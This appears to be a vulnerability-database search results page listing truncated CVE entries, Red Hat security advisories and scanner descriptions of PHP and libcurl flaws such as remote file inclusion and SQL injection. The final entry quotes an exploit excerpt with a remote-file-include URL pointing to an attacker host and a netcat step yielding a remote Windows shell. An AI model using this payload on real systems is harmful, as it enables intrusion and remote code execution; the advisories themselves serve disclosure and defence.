654 matches found
CVE-2005-4077
Multiple off-by-one errors in the cURL library libcurl 7.11.2 through 7.15.0 allow local users to trigger a buffer overflow and cause a denial of service or bypass PHP security restrictions via certain URLs that (1) are malformed in a way that prevents a terminating null byte from being added to...
CVE-2005-4077
CVE-2005-4077 affects libcurl (curl) versions 7.11.2–7.15.0, where multiple off-by-one errors can cause a buffer overflow. Exploitation is local and can trigger a denial of service or bypass PHP security restrictions via crafted URLs, either malformed to prevent a terminating null byte in hostnam...
[UNIX] MagpieRSS Remote Command Execution
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com...
BlackBoard Internet Newsboard System remote file include flaw
The remote host is running the BlackBoard Internet Newsboard System, an open-source PHP-based internet bulletin board software. The remote version of this software is vulnerable to a remote file include flaw due to a lack of sanitization of user-supplied data. Successful exploitation of this issu...
PHP, ASP, CGI web applications security vulnerabilities
No description provided...
paFileDB fails to properly sanitize "query" parameter in "pafiledb.php"
Overview: paFileDB works around the default "off" state for the "register_globals" security directive in PHP and then fails to initialize the "query" variable, which can be used to inject arbitrary SQL queries. Description: "paFileDB is designed to allow webmasters have a database of files for...
CVE-2004-2010
PHP remote file inclusion vulnerability in index.php in phpShop 0.7.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the basedir parameter to reference a URL on a remote web server that contains phpshop.cfg...
PHP, ASP, CGI web applications security vulnerabilities
PHP inclusions, SQL injections, directory traversals, cross-site scripting, etc...
RHEL 4 : php (RHSA-2005:032)
The remote Redhat Enterprise Linux 4 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2005:032 advisory. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. Flaws including possible information disclosure,...
PHP/ASP/CGI web applications security bugs
PHP inclusions, SQL injections, directory traversals, cross-site scripting, spam sending, etc...
Important: Red Hat Security Advisory: php security update
Updated php packages that fix various security issues are now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server...
PHP/ASP/CGI web applications security bugs
PHP inclusions, SQL injections, directory traversals, cross-site scripting, etc...
Important: Red Hat Security Advisory: php security update
Updated php packages that fix various security issues are now available for Red Hat Enterprise Linux 2.1. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. A double-free bug was found in the deserialization code of PHP. PHP applications use the unserialize...
RHEL 2.1 : php (RHSA-2005:031)
Updated php packages that fix various security issues are now available for Red Hat Enterprise Linux 2.1. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. A double-free bug was found in the deserialization code of PHP. PHP applications use the unserialize...
CVE-2004-1020
The addslashes function in PHP 4.3.9 does not properly escape a NULL (/0) character, which may allow remote attackers to read arbitrary files in PHP applications that contain a directory traversal vulnerability in require or include statements, but are otherwise protected by the magic_quotes_gpc...
PHP 4.3.7 - openlog() Remote Buffer Overflow
PHP 4.3.7 - openlog Remote Buffer Overflow http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt BOOM.... netcat www.vulnerable.box 65535 Microsoft Windows 2000 versie 5.00.2195 C Copyright 1985-2000 Microsoft Corp. C:\Program Files\Apache Group\Apache2 --- Getting a...